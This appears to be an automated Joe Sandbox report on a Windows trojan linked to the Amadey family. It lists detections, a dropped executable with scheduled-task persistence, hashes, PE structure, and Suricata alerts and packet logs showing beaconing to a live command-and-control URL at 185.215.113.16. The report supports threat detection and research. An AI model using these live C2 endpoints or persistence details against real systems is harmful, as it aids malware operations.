                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    EXyAlLKIck.exe100%AviraTR/Crypt.TPM.Gen
                    EXyAlLKIck.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.php32100%Avira URL Cloudphishing
                    http://185.215.113.16/100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpc100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpp;100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php=100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpy100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpZ100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpx100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpt100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php3100%Avira URL Cloudphishing

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    206.23.85.13.in-addr.arpa
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.phptrue
                      • Avira URL Cloud: phishing
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.php32axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpcaxplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.php=axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpZaxplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpp;axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpyaxplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpxaxplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phptaxplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.php3axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.16
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1483002
                      Start date and time:2024-07-26 13:42:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 57s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:EXyAlLKIck.exe
                      renamed because original name is a hash value
                      Original Sample Name:fddcf49860999a5147f34179c07c4bc6.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                      EGA Information:
                      • Successful, ratio: 25%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target EXyAlLKIck.exe, PID 3220 because it is empty
                      • Execution Graph export aborted for target axplong.exe, PID 5000 because there are no executed function
                      • Execution Graph export aborted for target axplong.exe, PID 728 because there are no executed function
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: EXyAlLKIck.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      07:44:01API Interceptor1007x Sleep call for process: axplong.exe modified
                      13:42:56Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.16IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                      • 185.215.113.16/Jo89Ku7d/index.php
                      file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                      • 185.215.113.16/Jo89Ku7d/index.php
                      JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                      • 185.215.113.16/Jo89Ku7d/index.php
                      PE1dBCFKZv.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.16/Jo89Ku7d/index.php
                      random.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.16/Jo89Ku7d/index.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLIRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                      • 185.215.113.16
                      LbMTyCFRzs.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.19
                      file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                      • 185.215.113.16
                      DHBIT8FeuO.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.19
                      JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                      • 185.215.113.16
                      PE1dBCFKZv.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.16
                      random.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousRedLineBrowse
                      • 185.215.113.67
                      file.exeGet hashmaliciousRedLineBrowse
                      • 185.215.113.67

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                      Download File
                      Process:C:\Users\user\Desktop\EXyAlLKIck.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1878528
                      Entropy (8bit):7.9511790279672505
                      Encrypted:false
                      SSDEEP:49152:P5q5hwjJGpXZ/jHfZELr33caRxXTJ5MJRiNxEBm7HWdYOyMCoU1:swFGpXZjfZ+rnDxl5MJUxP2yG
                      MD5:FDDCF49860999A5147F34179C07C4BC6
                      SHA1:9272C4C84A44387FF0546C33F8816DE12E993D3D
                      SHA-256:0EC6F1E4EA70E94D4B6245ECB1CA8953515E41AD631AF0FBDAD75C2AB14C36E8
                      SHA-512:069E5D84F7E9058972C9D1BD6293435EA3EAC9814925C248F753BF35123B9C66B3A61A9F278000E5ECD7BEFD980345D076646B7D4F25EC8574D4D1D47A103075
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................J.....x.....@.................................W...k.............................J.............................p.J..................................................... . ............................@....rsrc...............................@....idata ............................@... .`*.........................@...wfabfqoe......1.....................@...qxvdwait......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\EXyAlLKIck.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0

                      C:\Windows\Tasks\axplong.job

                      Download File
                      Process:C:\Users\user\Desktop\EXyAlLKIck.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):3.4418354476099817
                      Encrypted:false
                      SSDEEP:6:hFKsnX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0l1XyEt0:hMsXDQ1lOmeeDNfXV1CEt0
                      MD5:C542D68DA39ECA3C0F6F50A8686B79F3
                      SHA1:0BD14C692B72DEEDE72D586D3991DC2CC2ED13C0
                      SHA-256:285F6B060329C3A2E349CBE8690911D1D019DE12B8CB86003B2D1824090A26DB
                      SHA-512:E925B1E23D6E3F86D757B95E5959EF3DAC6A9C8E3E98FDC43B2409168348587080CF5E3D40BB7D332ED2D4A62E4A3071D48F035183C97CDC302128D157300797
                      Malicious:false
                      Reputation:low
                      Preview:...........M.,....C.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................+.@3P.........................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.9511790279672505
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:EXyAlLKIck.exe
                      File size:1'878'528 bytes
                      MD5:fddcf49860999a5147f34179c07c4bc6
                      SHA1:9272c4c84a44387ff0546c33f8816de12e993d3d
                      SHA256:0ec6f1e4ea70e94d4b6245ecb1ca8953515e41ad631af0fbdad75c2ab14c36e8
                      SHA512:069e5d84f7e9058972c9d1bd6293435ea3eac9814925c248f753bf35123b9c66b3a61a9f278000e5ecd7befd980345d076646b7d4f25ec8574d4d1d47a103075
                      SSDEEP:49152:P5q5hwjJGpXZ/jHfZELr33caRxXTJ5MJRiNxEBm7HWdYOyMCoU1:swFGpXZjfZ+rnDxl5MJUxP2yG
                      TLSH:EA9533124FB29B19DC6EF83E271BAF5869D4C5105C924FBD331841A8DDF3A5382F6A50
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x8ab000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007FE5B941D84Ah
                      js 00007FE5B941D862h
                      add byte ptr [eax], al
                      jmp 00007FE5B941F845h
                      add byte ptr [ebx], cl
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ebx], cl
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a9cc00x10wfabfqoe
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x4a9c700x18wfabfqoe
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x680000x2de00b640ac6ffc6478af85df53e1cade5079False0.9973763198228883data7.982589984423413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x690000x1e00x20064903977b780070f8d5c3f7ecceace36False0.578125data4.4757811155299025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x6b0000x2a60000x200ab8ba28d2a4157ea4e9e8c1f2873e1d0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      wfabfqoe0x3110000x1990000x1990005c371e5c77c9a370e158837dbd7d0558False0.994585331028423data7.954564972616457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      qxvdwait0x4aa0000x10000x400b4ec7f2bacab7015e5467775acfbef74False0.697265625data5.672679022019647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x4ab0000x30000x2200b50a2421a633ebb3255a8739c7fdcc6aFalse0.06502757352941177DOS executable (COM)0.7147883333844974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x4a9cd00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                      2024-07-26T13:44:21.031169+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35366280192.168.2.5185.215.113.16
                      2024-07-26T13:43:32.829875+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435364552.165.165.26192.168.2.5
                      2024-07-26T13:43:14.534208+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970420.12.23.50192.168.2.5
                      2024-07-26T13:44:27.104268+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35366780192.168.2.5185.215.113.16
                      2024-07-26T13:43:33.868995+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435364652.165.165.26192.168.2.5
                      2024-07-26T13:44:03.059226+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35364780192.168.2.5185.215.113.16

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 26, 2024 13:44:02.256671906 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:02.261879921 CEST8053647185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:02.262007952 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:02.262164116 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:02.267100096 CEST8053647185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:03.059106112 CEST8053647185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:03.059226036 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.061624050 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.066549063 CEST8053647185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:03.366684914 CEST8053647185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:03.368688107 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.493084908 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.497072935 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.506570101 CEST8053648185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:03.508558035 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.510493994 CEST8053647185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:03.512456894 CEST5364780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.522540092 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:03.528455973 CEST8053648185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:04.280569077 CEST8053648185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:04.280810118 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.281440020 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.286279917 CEST8053648185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:04.540323019 CEST8053648185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:04.540431023 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.649923086 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.650410891 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.655975103 CEST8053649185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:04.656097889 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.656192064 CEST8053648185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:04.656254053 CEST5364880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.656502008 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:04.661487103 CEST8053649185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:05.670748949 CEST8053649185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:05.671137094 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:05.672177076 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:05.672499895 CEST8053649185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:05.672722101 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:05.680309057 CEST8053649185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:05.920926094 CEST8053649185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:05.922504902 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.024518967 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.026403904 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.031043053 CEST8053649185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:06.031369925 CEST5364980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.031439066 CEST8053650185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:06.032423973 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.032423973 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.038508892 CEST8053650185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:06.813628912 CEST8053650185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:06.813705921 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.814331055 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:06.819212914 CEST8053650185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:07.068056107 CEST8053650185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:07.068274975 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.181268930 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.181335926 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.187397003 CEST8053651185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:07.187546015 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.187690973 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.188596964 CEST8053650185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:07.188652039 CEST5365080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.193249941 CEST8053651185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:07.941807985 CEST8053651185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:07.941891909 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.942713022 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:07.947679043 CEST8053651185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:08.190907955 CEST8053651185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:08.191061020 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:08.306122065 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:08.306447029 CEST5365280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:08.311336040 CEST8053652185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:08.312820911 CEST5365280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:08.312820911 CEST5365280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:08.312982082 CEST8053651185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:08.313153982 CEST5365180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:08.317733049 CEST8053652185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:09.065239906 CEST8053652185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:09.065315962 CEST5365280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:09.065877914 CEST5365280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:09.070713997 CEST8053652185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:09.321120977 CEST8053652185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:09.322140932 CEST5365280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:09.430727005 CEST5365280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:09.431041956 CEST5365380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:09.438810110 CEST8053653185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:09.438911915 CEST5365380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:09.439378977 CEST5365380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:09.440042973 CEST8053652185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:09.440221071 CEST5365280192.168.2.5185.215.113.16
